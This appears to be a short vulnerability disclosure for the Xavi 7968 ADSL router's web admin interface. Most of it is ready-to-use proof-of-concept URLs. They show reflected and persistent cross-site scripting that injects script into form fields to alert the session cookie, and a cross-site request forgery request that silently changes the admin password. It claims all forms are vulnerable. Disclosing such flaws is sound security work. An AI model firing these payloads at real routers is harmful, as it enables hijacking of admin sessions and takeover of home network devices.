The Xavi 7968 router suffers from cross site request forgery and persistent cross site scripting vulnerabilities.
0c039e2b4d465e7ff02208af6529c8a0ca6aed64f68bf75e27e8e39625367265
Xavi 7968 ADSL Router: Persistent cross site scripting (XSS) / Cross site request forgery (CSRF)
------------------------------------------------------------------------------------------------
Description: Xavi 7968 Router is completely vulnerable to Persistent cross site scripting (XSS) and Cross site request forgery (CSRF). (Admin privileges)
** XSS example: (Alert with Cookie)
http://192.168.1.1/webconfig/wan/confirm.html/confirm?context=pageAction%3Dadd%26pvcName%3D%2522%253e%253c%252ftd%253e%253cscript%253ealert%28document.cookie%29%253c%252fscript%253e%26vpi%3D0%26vci%3D38%26scat%3DUBR%26accessmode%3Dpppoe%26encap%3Dvcmux%26encapmode%3Dbridged%26iptype%3Ddhcp%26nat_enable%3Dfalse%26def_route_enable%3Dfalse%26qos_enable%3Dfalse%26chkPPPOEAC%3Dfalse%26tBoxPPPOEAC%3DNot%2520Configured%26sessiontype%3Dalways_on%26username%3Da%26password%3Dss&confirm=+Apply+
** Persistent XSS example: (Alert with Cookie)
Add code: http://192.168.1.1/webconfig/lan/lan_config.html/local_lan_config?ip_add_txtbox=192.168.1.1&sub_mask_txtbox=255.255.255.0&host_name_txtbox=Hack<SCRIPT>alert(document.cookie)</script>&domain_name_txtbox=local.lan&mtu_txtbox=1500&next=Apply
Exploit URL: http://192.168.1.1/webconfig/upgrade_image/image_upgrade.html
** Cross site request forgery example: (Change admin Password 1234 -> 12345):
http://192.168.1.2/webconfig/admin_passwd/passwd.html/admin_passwd?sysUserName=1234&sysPassword=12345&sysCfmPwd=12345&cmdSubmit=Apply
This is just an example, all forms in the router interface are vulnerable to CSRF and if they accept text input, to XSS.
Author: Busindre busilezas[@]gmail.com